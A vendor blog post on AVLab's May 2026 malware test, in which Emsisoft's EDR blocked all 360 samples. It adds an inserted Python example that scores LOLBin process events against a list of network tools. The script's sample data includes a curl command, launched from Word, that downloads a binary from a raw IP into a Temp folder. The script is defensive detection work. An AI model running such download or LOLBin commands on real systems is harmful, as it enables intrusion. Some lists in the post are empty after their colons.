
Emsisoft Blocks All 360 Threats in May AVLab Test


The May 2026 Advanced In-The-Wild Malware Test from AVLab Cybersecurity Foundation evaluated 14 security solutions against 360 unique malware samples. Emsisoft Enterprise Security + EDR achieved 100% detection, earning EXCELLENT certification under the 99.6% protection threshold.

This test edition also highlighted the growing use of legitimate Windows tools (LOLBins) and the importance of telemetry and incident reconstruction capabilities.

The evolving role of LOLBins in modern attacks

The May test confirmed that cybercriminals are increasingly relying on legitimate system components to evade detection. Among the most frequently observed LOLBins were:

These tools were used to download files, execute code, carry out commands, and communicate with attacker infrastructure. The analysis also revealed use of less common utilities including tor.exe (1,466 occurrences), curl.exe, sftp.exe, ssh.exe, ftp.exe, nslookup.exe, git.exe, and msbuild.exe.

The presence of tor.exe at significant volume indicates attackers are actively anonymizing network communication to hinder infrastructure analysis. Additionally, Microsoft’s native integration of Linux commands via Coreutils tools represents a new vector that AVLab will examine in future test editions.

The continued reliance on LOLBins demonstrates that process-based detection alone is insufficient. Behavioral analysis and comprehensive telemetry are required to distinguish malicious activity from legitimate system operations.
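The point that a process name alone is not a verdict can be shown with a small contextual scoring rule. The following is an added example, not code from AVLab or Emsisoft: it takes process-creation events (constructed sample telemetry, not real test data), ignores everything that is not one of the utilities named above, and only raises a finding when the context is unusual (an Office or script-host parent, a user-writable path on the command line, a raw-IP URL, or tor.exe appearing at all). The weights, the parent list and the assumption that tor.exe is absent from the enterprise baseline are illustrative choices.

```python
"""Added example (not AVLab's or Emsisoft's code): context-based scoring of
LOLBin process events, showing why the image name alone is insufficient."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Legitimate binaries the May report says were abused (names taken from the post).
LOLBINS = {"curl.exe", "tor.exe", "sftp.exe", "ssh.exe", "ftp.exe",
           "nslookup.exe", "git.exe", "msbuild.exe"}

# Parents from which a network or build utility is rarely spawned legitimately
# (illustrative list; tune against your own baseline).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe",
                      "wscript.exe", "cscript.exe", "mshta.exe"}

USER_WRITABLE = re.compile(r"\\(temp|appdata|public)\\", re.IGNORECASE)
RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.IGNORECASE)


@dataclass
class ProcessEvent:
    image: str     # executable name of the new process
    parent: str    # executable name of the parent process
    cmdline: str   # full command line
    user: str


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, reasons). Non-LOLBin images score 0 without inspection;
    LOLBin images score only on surrounding context, never on the name alone
    (except tor.exe, which we assume is not in the enterprise baseline)."""
    image, parent = ev.image.lower(), ev.parent.lower()
    score, reasons = 0, []
    if image not in LOLBINS:
        return 0, reasons
    if parent in SUSPICIOUS_PARENTS:
        score += 3
        reasons.append(f"launched by {parent}")
    if USER_WRITABLE.search(ev.cmdline):
        score += 2
        reasons.append("user-writable path in command line")
    if RAW_IP_URL.search(ev.cmdline):
        score += 2
        reasons.append("raw-IP URL in command line")
    if image == "tor.exe":
        score += 2
        reasons.append("tor.exe not in enterprise baseline (assumed)")
    return score, reasons


def triage(events: list[ProcessEvent], threshold: int = 3) -> list[tuple[ProcessEvent, int, list[str]]]:
    """Keep only events whose contextual score reaches the threshold."""
    findings = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            findings.append((ev, score, reasons))
    return findings


# Constructed sample telemetry (not from the AVLab test). 203.0.113.0/24 is a
# documentation range; paths and users are made up.
SAMPLE_EVENTS = [
    ProcessEvent("curl.exe", "WINWORD.EXE",
                 r"curl.exe http://203.0.113.10/x.bin -o C:\Users\alice\AppData\Local\Temp\x.bin", "alice"),
    ProcessEvent("curl.exe", "cmd.exe",
                 r"curl.exe https://example.org/release-notes.txt", "bob"),
    ProcessEvent("git.exe", "Code.exe", r"git.exe pull --rebase", "bob"),
    ProcessEvent("msbuild.exe", "cmd.exe",
                 r"msbuild.exe C:\Users\alice\AppData\Local\Temp\build.proj", "alice"),
    ProcessEvent("tor.exe", "explorer.exe",
                 r"tor.exe --defaults-torrc C:\Users\carol\AppData\Roaming\tor\torrc", "carol"),
    ProcessEvent("notepad.exe", "explorer.exe", r"notepad.exe notes.txt", "carol"),
]

if __name__ == "__main__":
    for ev, score, reasons in triage(SAMPLE_EVENTS):
        print(f"{score:>2}  {ev.image:<12} parent={ev.parent:<14} {'; '.join(reasons)}")
```

Of the six constructed events only two reach the threshold: the curl.exe launched from Word with a raw-IP download into Temp, and the tor.exe under a user profile. The curl.exe fetching release notes and the git.exe pull score zero despite being the same binaries, and the msbuild.exe run from Temp scores below the bar, which is the kind of borderline case where the surrounding telemetry (what the parent did next, what the project file contained) decides, not the process name.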

Threat landscape and sample composition

The May 2026 test comprised 360 malware samples. Of these, 318 were delivered over HTTP and 42 over HTTPS. Compromised servers were located primarily in the United States (179), Germany (51), and China (30).

HTTPS delivery remains a challenge for reputation-based detection mechanisms. SSL certificates indicate encryption, not safety, and attackers increasingly use encrypted channels to deliver payloads. The continued presence of HTTPS-delivered malware reinforces that URL reputation and blacklist-based approaches have limitations, as they require time to propagate threat intelligence.

Emsisoft’s performance: Detection and visibility

Emsisoft Enterprise Security + EDR blocked all 360 samples, achieving 100% detection and EXCELLENT certification.

Defense distribution:

Remediation time:

2.69 seconds average. This metric measures complete threat neutralization and system restoration, including removal of malicious artifacts and reversal of system changes.

The product was tested with its standard enterprise configuration: default settings, automatic PUP repair, EDR active, Rollback functionality enabled, and browser protection engaged. Testing with default configurations ensures results reflect the out-of-box experience for customers.

Read the full May test summary here.

Test methodology and standards compliance

The Advanced In-The-Wild Malware Test is conducted six times annually. Each round evaluates products based on a full attack chain simulation with three complementary phases:

The test uses real malware samples obtained from active URLs, public threat intelligence feeds, honeypots, and monitored channels. Each sample undergoes SHA-256 hash comparison to eliminate duplicates, static analysis using YARA rules, and dynamic execution in Windows 11 to confirm malicious behavior before testing begins.

AVLab operates as a member of the Anti-Malware Testing Standards Organization (AMTSO) and complies with Microsoft Virus Initiative (MVI) requirements.

Conclusion

The May 2026 AVLab test results confirm that Emsisoft Enterprise Security + EDR continues to meet the increased 99.6% certification threshold, blocking all 360 malware samples.


As attackers increasingly leverage legitimate system tools and encrypted communication channels, the quality of telemetry and incident reconstruction capabilities becomes as critical as detection itself.
